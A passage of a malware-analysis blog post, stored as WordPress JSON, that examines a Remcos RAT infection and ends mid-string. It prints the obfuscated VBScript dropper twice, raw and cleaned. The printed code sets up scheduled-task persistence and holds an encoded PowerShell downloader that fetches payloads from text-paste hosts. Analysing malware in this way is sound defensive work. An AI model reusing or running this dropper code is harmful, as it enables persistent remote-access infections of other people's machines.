{"id":1614,"date":"2024-01-14T17:04:39","date_gmt":"2024-01-14T23:04:39","guid":{"rendered":"https:\/\/www.herbiez.com\/?p=1614"},"modified":"2024-01-22T20:10:18","modified_gmt":"2024-01-23T02:10:18","slug":"2024-01-14-remcos-rat-infection","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1614","title":{"rendered":"2024-01-14 Remcos RAT Infection"},"content":{"rendered":"<h4>Summary<\/h4>\n<p>The last time I &#8220;published&#8221; anything was about 1.8 years ago. So in the spirit of New Year&#8217;s resolutions to myself, it really is time for me to get back on the horse and get back into some <em>sort<\/em> of posting again. So let&#8217;s jump into an alert that I came across for what looks to be Remcos RAT.<\/p>\n<p>The artifacts from this investigation can be found over at my GitHub <a href=\"https:\/\/github.com\/herbiezimmerman\/2024-01-14-Remcos-RAT\" target=\"_blank\" rel=\"noopener\">here<\/a>, which also includes the output from the two URLs seen in the VB script. The memory dump of the Remcos process can be found <a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/paste.ee_.exe_mem_dump.zip\">here<\/a>.<\/p>\n<h4>Initial Analysis<\/h4>\n<p>Based on the initial investigation, the VB script was downloaded directly from hxxps:\/\/hidrive[.]ionos[.]com\/lnk\/SBBJoDne#file with no referrer or anything of the sort. 
Once the file is executed the following process tree can be seen.<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/alert.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1615\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/alert-886x1024.png\" alt=\"\" width=\"886\" height=\"1024\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/alert-886x1024.png 886w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/alert-260x300.png 260w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/alert-768x888.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/alert-1329x1536.png 1329w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/alert-1772x2048.png 1772w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/alert-130x150.png 130w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/><\/a><\/p>\n<p>Looking at what was inside this VB script file, initially there seems to be a lot of noise\/garbage as one would expect.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;Reads the registry looking for a JoYB qxtjb and if found reports whether or not\r\n&#039;that qxtjb enables JoYB.\r\nFunction OoUrkN(qxtjb, UHnWO)\r\n\r\nOn Error Resume Next\r\n\r\nDim OWOhO, PeQGtlValue\r\nPeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb)\r\n\r\nIf Err.Number = 0 Then\r\nIf PeQGtlValue = 1 Then\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp;amp;amp; QLNYHYaBW\r\nOWOhO = True\r\nElse\r\nYryWTxZYO UHnWO 
&amp;amp;amp;amp;amp;amp;amp; DkIekRQq\r\nOWOhO = False\r\nEnd If\r\n\r\nYryWTxZYO qxtjb\r\nYryWTxZYO qNDMMM\r\nElse\r\nOWOhO = False\r\nEnd If\r\nErr.Clear\r\n\r\nOoUrkN = OWOhO\r\nEnd Function\r\n\r\n\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n&#039;DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n&#039;JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\n\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n&#039;DgWuA and returns whether JoYB is enabled or disabled. 
Flavors are JoYB PTNJlzJZf,\r\n&#039;JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n&#039;DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n&#039;JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n&#039;DgWuA and returns whether JoYB is enabled or disabled. 
Flavors are JoYB PTNJlzJZf,\r\n&#039;JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n&#039;DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n&#039;JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nOn Error Resume Next\r\nif 0 then\r\nSet objShell = CreateObject(&quot;WScript.Shell&quot;)\r\n\r\nzoologico = &quot;MinhaTarefaVBScript&quot;\r\n\r\neCoeCoeCoeCo = &quot;schtasks \/delete \/tn &quot; &amp;amp;amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp;amp;amp; &quot; \/f&quot;\r\nobjShell.Run eCoeCoeCoeCo, 0, True\r\n\r\nstrScriptPath = WScript.ScriptFullName\r\n\r\nstrTempFolder = objShell.ExpandEnvironmentStrings(&quot;%TEMP%&quot;)\r\n\r\nMirasoles = strTempFolder &amp;amp;amp;amp;amp;amp;amp; &quot;\\SeuScript.vbs&quot;\r\n\r\n&#039; Cria um objeto FileSystemObject\r\nSet objFSO = 
CreateObject(&quot;Scripting.FileSystemObject&quot;)\r\n\r\nOn Error Resume Next\r\n&#039; Tenta copiar o arquivo para a pasta tempor?ria\r\nobjFSO.CopyFile strScriptPath, Mirasoles, True\r\nIf Err.Number &amp;amp;amp;amp;amp;amp;lt;&amp;amp;amp;amp;amp;amp;gt; 0 Then\r\nMsgBox &quot;Erro ao copiar o arquivo para a pasta tempor?ria: &quot; &amp;amp;amp;amp;amp;amp;amp; Err.Description\r\nEnd If\r\nOn Error GoTo 0\r\n\r\nstrCreateCommand = &quot;schtasks \/create \/tn &quot; &amp;amp;amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp;amp;amp; &quot; \/tr &quot;&quot;&quot; &amp;amp;amp;amp;amp;amp;amp; Mirasoles &amp;amp;amp;amp;amp;amp;amp; &quot;&quot;&quot; \/sc minute \/mo 1&quot;\r\nobjShell.Run strCreateCommand, 0, True\r\n\r\nend if\r\nOn Error Resume Next\r\n\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n&#039;DgWuA and returns whether JoYB is enabled or disabled. 
Flavors are JoYB PTNJlzJZf,\r\n&#039;JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nEnd If\r\n\r\nxOdtc = OWOhO\r\nEnd Function\r\n\r\n\r\n\r\nOn Error Resume Next\r\n\r\nmmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:\r\nmmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:\r\nmmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:\r\n\r\ndim ARmxU \r\nARmxU = WScript.ScriptFullName\r\n\r\nHwxcO = (&quot;J?%Bl?%G8?%a?%Bl?%HE?%I?%?%9?%C?%?%Jw?%w?%DM?%Jw?%7?%CQ?%cgBk?%GE?%dQBu?%C?%?%PQ?%g?%Cc?%JQBw?%Ho?%QQBj?%E8?%ZwBJ?%G4?%TQBy?%CU?%Jw?%7?%Fs?%QgB5?%HQ?%ZQBb?%F0?%XQ?%g?%CQ?%Z?%Bo?%Gc?%b?%Bs?%C?%?%PQ?%g?%Fs?%cwB5?%HM?%d?%Bl?%G0?%LgBD?%G8?%bgB2?%GU?%cgB0?%F0?%Og?%6?%EY?%cgBv?%G0?%QgBh?%HM?%ZQ?%2?%DQ?%UwB0?%HI?%aQBu?%Gc?%K?%?%g?%Cg?%TgBl?%Hc?%LQBP?%GI?%agBl?%GM?%d?%?%g?%E4?%ZQB0?%C4?%VwBl?%GI?%QwBs?%Gk?%ZQBu?%HQ?%KQ?%u?%EQ?%bwB3?%G4?%b?%Bv?%GE?%Z?%BT?%HQ?%cgBp?%G4?%Zw?%o?%C?%?%K?%BO?%GU?%dw?%t?%E8?%YgBq?%GU?%YwB0?%C?%?%TgBl?%HQ?%LgBX?%GU?%YgBD?%Gw?%aQBl?%G4?%d?%?%p?%C4?%R?%Bv?%Hc?%bgBs?%G8?%YQBk?%FM?%d?%By?%Gk?%bgBn?%Cg?%JwBo?%HQ?%d?%Bw?%HM?%Og?%v?%C8?%d?%Bl?%Hg?%d?%Bi?%Gk?%bg?%u?%G4?%ZQB0?%C8?%cgBh?%Hc?%LwBl?%Ho?%agBt?%G8?%ZgB6?%DM?%cw?%2?%Cc?%KQ?%g?%Ck?%I?%?%p?%Ds?%WwBz?%Hk?%cwB0?%GU?%bQ?%u?%EE?%c?%Bw?%EQ?%bwBt?%GE?%aQBu?%F0?%Og?%6?%EM?%dQBy?%HI?%ZQBu?%HQ?%R?%Bv?%G0?%YQBp?%G4?%LgBM?%G8?%YQBk?%Cg?%J?%Bk?%Gg?%ZwBs?%Gw?%KQ?%u?%Ec?%ZQB0?%FQ?%eQBw?%GU?%K?%?%n?%E0?%YQBy?%GE?%YwBh?%Gk?%YgBv?%C4?%QwBs?%GE?%cwBz?%DE?%Jw?%p?%C4?%RwBl?%HQ?%TQBl?%HQ?%a?%Bv?%GQ?%K?%?%n?%E0?%cwBx?%EI?%SQBi?%Fk?%Jw?%p?%C4?%SQBu?%HY?%bwBr?%GU?%K?%?%k?%G4?%dQBs?%Gw?%L?%?%g?%Fs?%bwBi?%Go?%ZQBj?%HQ?%WwBd?%F0?%I?%?%o?%Cc?%M?%
?%v?%Es?%dwBC?%FI?%Vw?%v?%GQ?%LwBl?%GU?%LgBl?%HQ?%cwBh?%H?%?%Lw?%v?%Do?%cwBw?%HQ?%d?%Bo?%Cc?%I?%?%s?%C?%?%J?%By?%GQ?%YQB1?%G4?%I?%?%s?%C?%?%JwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%LQ?%t?%C0?%LQ?%t?%C0?%LQ?%n?%Cw?%I?%?%k?%GU?%bwBo?%GU?%cQ?%s?%C?%?%Jw?%x?%Cc?%L?%?%g?%Cc?%UgBv?%GQ?%YQ?%n?%C?%?%KQ?%p?%Ds?%&quot;)\r\n\r\ndim waalb\r\n\r\nwaalb = (&quot;$dgUdYL = &#039;&quot;) &amp;amp;amp;amp;amp;amp;amp; HwxcO &amp;amp;amp;amp;amp;amp;amp; &quot;&#039;&quot; \r\nwaalb = waalb &amp;amp;amp;amp;amp;amp;amp; &quot;;$KByHL = &#x5B;system.Text.Encoding]::Unicode.GetString( &quot;\r\n\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;Reads the registry looking for a JoYB qxtjb and if found reports whether or not\r\n&#039;that qxtjb enables JoYB.\r\nFunction OoUrkN(qxtjb, UHnWO)\r\n\r\nOn Error Resume Next\r\n\r\nDim OWOhO, PeQGtlValue\r\nPeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb)\r\n\r\nIf Err.Number = 0 Then\r\nIf PeQGtlValue = 1 Then\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp;amp;amp; QLNYHYaBW\r\nOWOhO = True\r\nElse\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp;amp;amp; DkIekRQq\r\nOWOhO = False\r\nEnd If\r\n\r\nYryWTxZYO qxtjb\r\nYryWTxZYO qNDMMM\r\nElse\r\nOWOhO = False\r\nEnd If\r\nErr.Clear\r\n\r\nOoUrkN = OWOhO\r\nEnd Function\r\n\r\n\r\n\r\n&#039;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n&#039;Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n&#039;DgWuA and returns whether JoYB 
is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n&#039;JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\nFunction xOdtc(DgWuA)\r\n\r\nOn Error Resume Next\r\n\r\n\r\n\r\n\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n<\/pre>\n<p>Once the script was cleaned up using CyberChef and the <strong>unique<\/strong> recipe, this is what was left.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n&#039;Reads the registry looking for a JoYB qxtjb and if found reports whether or not\r\n&#039;that qxtjb enables JoYB.\r\n\r\nFunction OoUrkN(qxtjb, UHnWO)\r\nOn Error Resume Next\r\nDim OWOhO, PeQGtlValue\r\nPeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb)\r\nIf Err.Number = 0 Then\r\nIf PeQGtlValue = 1 Then\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp;amp;amp; QLNYHYaBW\r\nOWOhO = True\r\nElse\r\nYryWTxZYO UHnWO &amp;amp;amp;amp;amp;amp;amp; DkIekRQq\r\nOWOhO = False\r\nEnd If\r\nYryWTxZYO qxtjb\r\nYryWTxZYO qNDMMM\r\nElse\r\nOWOhO = False\r\nEnd If\r\nErr.Clear\r\nOoUrkN = OWOhO\r\nEnd Function\r\n\r\n&#039;Checks the registry for a particular qxtjb that enables JoYB in one specific\r\n&#039;DgWuA and returns whether JoYB is enabled or disabled. 
Flavors are JoYB PTNJlzJZf,\r\n&#039;JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16\r\n\r\nFunction xOdtc(DgWuA)\r\n\r\nOWOhO = False\r\nIf (DfaDL = KcnsL) Then\r\nOWOhO = OoUrkN(qxtjb, UHnWO)\r\nElseIf (DfaDL = yrHLz) Then\r\n\r\n\r\nDim amTLpM, USKNnw\r\nFor Each amTLpM In JYXNc\r\nUSKNnw = qxtjb &amp;amp;amp;amp;amp;amp;amp; amTLpM &amp;amp;amp;amp;amp;amp;amp; wpunit\r\nOWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)\r\nNext\r\nxOdtc = OWOhO\r\n\r\nOn Error Resume Next\r\nif 0 then\r\n\r\nSet objShell = CreateObject(&quot;WScript.Shell&quot;)\r\nzoologico = &quot;MinhaTarefaVBScript&quot;\r\neCoeCoeCoeCo = &quot;schtasks \/delete \/tn &quot; &amp;amp;amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp;amp;amp; &quot; \/f&quot;\r\nobjShell.Run eCoeCoeCoeCo, 0, True\r\nstrScriptPath = WScript.ScriptFullName\r\nstrTempFolder = objShell.ExpandEnvironmentStrings(&quot;%TEMP%&quot;)\r\nMirasoles = strTempFolder &amp;amp;amp;amp;amp;amp;amp; &quot;\\SeuScript.vbs&quot;\r\n&#039; Cria um objeto FileSystemObject\r\nSet objFSO = CreateObject(&quot;Scripting.FileSystemObject&quot;)\r\nOn Error Resume Next\r\n&#039; Tenta copiar o arquivo para a pasta tempor\ufffdria\r\nobjFSO.CopyFile strScriptPath, Mirasoles, True\r\nIf Err.Number &amp;amp;amp;amp;amp;amp;lt;&amp;amp;amp;amp;amp;amp;gt; 0 Then\r\nMsgBox &quot;Erro ao copiar o arquivo para a pasta tempor\ufffdria: &quot; &amp;amp;amp;amp;amp;amp;amp; Err.Description\r\nEnd If\r\nOn Error GoTo 0\r\nstrCreateCommand = &quot;schtasks \/create \/tn &quot; &amp;amp;amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp;amp;amp; &quot; \/tr &quot;&quot;&quot; &amp;amp;amp;amp;amp;amp;amp; Mirasoles &amp;amp;amp;amp;amp;amp;amp; &quot;&quot;&quot; \/sc minute \/mo 1&quot;\r\nobjShell.Run strCreateCommand, 0, True\r\nend if\r\nmmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:\r\ndim ARmxU \r\nARmxU = WScript.ScriptFullName\r\nHwxcO = 
(&quot;J\ufffd%Bl\ufffd%G8\ufffd%a\ufffd%Bl\ufffd%HE\ufffd%I\ufffd%\ufffd%9\ufffd%C\ufffd%\ufffd%Jw\ufffd%w\ufffd%DM\ufffd%Jw\ufffd%7\ufffd%CQ\ufffd%cgBk\ufffd%GE\ufffd%dQBu\ufffd%C\ufffd%\ufffd%PQ\ufffd%g\ufffd%Cc\ufffd%JQBw\ufffd%Ho\ufffd%QQBj\ufffd%E8\ufffd%ZwBJ\ufffd%G4\ufffd%TQBy\ufffd%CU\ufffd%Jw\ufffd%7\ufffd%Fs\ufffd%QgB5\ufffd%HQ\ufffd%ZQBb\ufffd%F0\ufffd%XQ\ufffd%g\ufffd%CQ\ufffd%Z\ufffd%Bo\ufffd%Gc\ufffd%b\ufffd%Bs\ufffd%C\ufffd%\ufffd%PQ\ufffd%g\ufffd%Fs\ufffd%cwB5\ufffd%HM\ufffd%d\ufffd%Bl\ufffd%G0\ufffd%LgBD\ufffd%G8\ufffd%bgB2\ufffd%GU\ufffd%cgB0\ufffd%F0\ufffd%Og\ufffd%6\ufffd%EY\ufffd%cgBv\ufffd%G0\ufffd%QgBh\ufffd%HM\ufffd%ZQ\ufffd%2\ufffd%DQ\ufffd%UwB0\ufffd%HI\ufffd%aQBu\ufffd%Gc\ufffd%K\ufffd%\ufffd%g\ufffd%Cg\ufffd%TgBl\ufffd%Hc\ufffd%LQBP\ufffd%GI\ufffd%agBl\ufffd%GM\ufffd%d\ufffd%\ufffd%g\ufffd%E4\ufffd%ZQB0\ufffd%C4\ufffd%VwBl\ufffd%GI\ufffd%QwBs\ufffd%Gk\ufffd%ZQBu\ufffd%HQ\ufffd%KQ\ufffd%u\ufffd%EQ\ufffd%bwB3\ufffd%G4\ufffd%b\ufffd%Bv\ufffd%GE\ufffd%Z\ufffd%BT\ufffd%HQ\ufffd%cgBp\ufffd%G4\ufffd%Zw\ufffd%o\ufffd%C\ufffd%\ufffd%K\ufffd%BO\ufffd%GU\ufffd%dw\ufffd%t\ufffd%E8\ufffd%YgBq\ufffd%GU\ufffd%YwB0\ufffd%C\ufffd%\ufffd%TgBl\ufffd%HQ\ufffd%LgBX\ufffd%GU\ufffd%YgBD\ufffd%Gw\ufffd%aQBl\ufffd%G4\ufffd%d\ufffd%\ufffd%p\ufffd%C4\ufffd%R\ufffd%Bv\ufffd%Hc\ufffd%bgBs\ufffd%G8\ufffd%YQBk\ufffd%FM\ufffd%d\ufffd%By\ufffd%Gk\ufffd%bgBn\ufffd%Cg\ufffd%JwBo\ufffd%HQ\ufffd%d\ufffd%Bw\ufffd%HM\ufffd%Og\ufffd%v\ufffd%C8\ufffd%d\ufffd%Bl\ufffd%Hg\ufffd%d\ufffd%Bi\ufffd%Gk\ufffd%bg\ufffd%u\ufffd%G4\ufffd%ZQB0\ufffd%C8\ufffd%cgBh\ufffd%Hc\ufffd%LwBl\ufffd%Ho\ufffd%agBt\ufffd%G8\ufffd%ZgB6\ufffd%DM\ufffd%cw\ufffd%2\ufffd%Cc\ufffd%KQ\ufffd%g\ufffd%Ck\ufffd%I\ufffd%\ufffd%p\ufffd%Ds\ufffd%WwBz\ufffd%Hk\ufffd%cwB0\ufffd%GU\ufffd%bQ\ufffd%u\ufffd%EE\ufffd%c\ufffd%Bw\ufffd%EQ\ufffd%bwBt\ufffd%GE\ufffd%aQBu\ufffd%F0\ufffd%Og\ufffd%6\ufffd%EM\ufffd%dQBy\ufffd%HI\ufffd%ZQBu\ufffd%HQ\ufffd%R\ufffd%Bv\ufffd%G0\ufffd%YQBp\ufffd%G4\ufffd%LgBM\ufffd%G8\ufffd%YQBk\ufffd%
Cg\ufffd%J\ufffd%Bk\ufffd%Gg\ufffd%ZwBs\ufffd%Gw\ufffd%KQ\ufffd%u\ufffd%Ec\ufffd%ZQB0\ufffd%FQ\ufffd%eQBw\ufffd%GU\ufffd%K\ufffd%\ufffd%n\ufffd%E0\ufffd%YQBy\ufffd%GE\ufffd%YwBh\ufffd%Gk\ufffd%YgBv\ufffd%C4\ufffd%QwBs\ufffd%GE\ufffd%cwBz\ufffd%DE\ufffd%Jw\ufffd%p\ufffd%C4\ufffd%RwBl\ufffd%HQ\ufffd%TQBl\ufffd%HQ\ufffd%a\ufffd%Bv\ufffd%GQ\ufffd%K\ufffd%\ufffd%n\ufffd%E0\ufffd%cwBx\ufffd%EI\ufffd%SQBi\ufffd%Fk\ufffd%Jw\ufffd%p\ufffd%C4\ufffd%SQBu\ufffd%HY\ufffd%bwBr\ufffd%GU\ufffd%K\ufffd%\ufffd%k\ufffd%G4\ufffd%dQBs\ufffd%Gw\ufffd%L\ufffd%\ufffd%g\ufffd%Fs\ufffd%bwBi\ufffd%Go\ufffd%ZQBj\ufffd%HQ\ufffd%WwBd\ufffd%F0\ufffd%I\ufffd%\ufffd%o\ufffd%Cc\ufffd%M\ufffd%\ufffd%v\ufffd%Es\ufffd%dwBC\ufffd%FI\ufffd%Vw\ufffd%v\ufffd%GQ\ufffd%LwBl\ufffd%GU\ufffd%LgBl\ufffd%HQ\ufffd%cwBh\ufffd%H\ufffd%\ufffd%Lw\ufffd%v\ufffd%Do\ufffd%cwBw\ufffd%HQ\ufffd%d\ufffd%Bo\ufffd%Cc\ufffd%I\ufffd%\ufffd%s\ufffd%C\ufffd%\ufffd%J\ufffd%By\ufffd%GQ\ufffd%YQB1\ufffd%G4\ufffd%I\ufffd%\ufffd%s\ufffd%C\ufffd%\ufffd%JwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\uf